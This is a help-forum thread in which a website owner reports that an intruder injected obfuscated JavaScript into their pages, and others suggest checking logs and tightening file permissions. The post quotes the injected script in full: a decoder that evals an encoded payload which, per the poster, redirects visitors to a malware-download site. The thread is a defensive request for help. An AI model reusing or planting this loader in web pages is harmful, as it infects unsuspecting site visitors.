Still celebrating National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17

x
?
Solved

Virus on My websites

Posted on 2008-10-12
8
Medium Priority
?
324 Views
Last Modified: 2013-11-22
Someone hacks into my html and php server and he adds this piece of javascript code that it redirects you to a website that downloads virus

<script language=JavaScript>function pbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,24,6,16,62,13,7,17,31,21,0,0,0,0,0,0,40,9,12,1,32,22,5,47,26,38,3,43,28,49,61,57,29,41,19,59,48,11,23,25,51,42,39,0,0,0,0,8,0,14,4,50,53,0,46,45,52,10,18,56,44,30,27,55,54,58,36,37,34,60,33,35,15,2,20);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(253^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}pbn15('ijOrWiQtRS1tLI_taylpOiOr1YgMWiQZ_yAIRIkhi4_sAtWdH6Bsn4_Z3tWoRcAr1yBc_wuXioLoa4@Ze0PsAI1w6UghLIWI3SQrRI_IRI_h82QrmHOhRtWtjZ@hyKgdTcWt9aNwjtkrWE5lLI1sR0_ZRIQr3E5dVSuXb0Bczngp_wBcxKLXHngp8ogtzIWt9yLcaRLo9tAsHEWteKBcPS1tb2AIe0PIzq1w7cAv6xQrRtOoJ6lhzfOwLyAIJK5d')</script><!-- 64.202.163.152 -->

How can i protect my site and how can i track him down ? He has done a lot of damage on our reputation and our clients..

Please help.

0
Comment
Question by:cscg1976
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
8 Comments
 
LVL 7

Expert Comment

by:myhc
ID: 22700977
Do you have IIS logging setup on your IIS?
0
 
LVL 7

Expert Comment

by:myhc
ID: 22700985
What fire do you have protecting your IIS server, Does that have logging enabled?
0
 

Author Comment

by:cscg1976
ID: 22701315
It's a Linux box. I don't know what is hapenning.
0
Are You Ready for GDPR?

With the GDPR deadline set for May 25, 2018, many organizations are ill-prepared due to uncertainty about the criteria for compliance. According to a recent WatchGuard survey, a staggering 37% of respondents don't even know if their organization needs to comply with GDPR. Do you?

 
LVL 7

Expert Comment

by:myhc
ID: 22701360
Please provide Linux details : Model and versions.
Is the firewall part of the box or do you have a hardware firewall?
0
 
LVL 12

Expert Comment

by:lunadl
ID: 22702477
Ping your server to see if it was a DNS attack in stead of a data one. Do you know that he gained access to your machine. Ping from proxies to make sure you are hitting from multiple locations.
0
 

Author Comment

by:cscg1976
ID: 22702796
How can i ping from proxies?
0
 
LVL 21

Accepted Solution

by:
Daniel McAllister earned 2000 total points
ID: 22953303
This question SHOULD have been posted to a Linux zone...

The reason you're getting hacked is that your system is likely vulnerable to breakin from a user account with an easy-to-guess username/password combination (like username dan, password dan; or username dan, password password)

If you're getting hacked, then they're logging in as a USER and that USER is modifying your web site contents. The file is successfully modified because WRITE permission exists on the file.

As a FIRST step, set the permissions to "no-write" for all of your website
From a command prompt, probably with root permissions, execute
chmod ugo-w /var/www/html

If you STILL get hacked, then either your ROOT user password is known (or easy to guess), or the "culprit" is the owner of one of those files/folders.

What I've provided here are just rudimentary steps. It's possible, but unlikely, that you've got vulnerabilities in your apache web server, ssh server, or any of the other services you've got turned on. If you're a novice admin, you're probably also logging in directly as root (a VERY bad idea).

Suffice it to say, if you're NEW to Linux Admin and this is a "professional" server (business website(s), email, etc.), then you may want to look into paying a professional to "lock it down" for you.

Good Luck!

Dan
IT4SOHO
0
 
LVL 23

Expert Comment

by:Tony McCreath
ID: 23103334
I just found this article that also points to access via a user account

http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
0

Featured Post

Learn how to optimize MySQL for your business need

With the increasing importance of apps & networks in both business & personal interconnections, perfor. has become one of the key metrics of successful communication. This ebook is a hands-on business-case-driven guide to understanding MySQL query parameter tuning & database perf

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article investigates the question of whether a computer can really be cleaned once it has been infected, and what the best ways of cleaning a computer might be (in this author's opinion).
Without even knowing it, most of us are using web applications on a daily basis.  In fact, Gmail and Yahoo email, Twitter, Facebook, and eBay are used by most of us daily—and they are web applications. We generally confuse these web applications to…
Learn how to set-up PayPal payment integration in your Wufoo form. Allow your users to remit payment through PayPal upon completion of your online form. This is helpful for collecting membership payments, customer payments, donations, and more.
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…

670 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question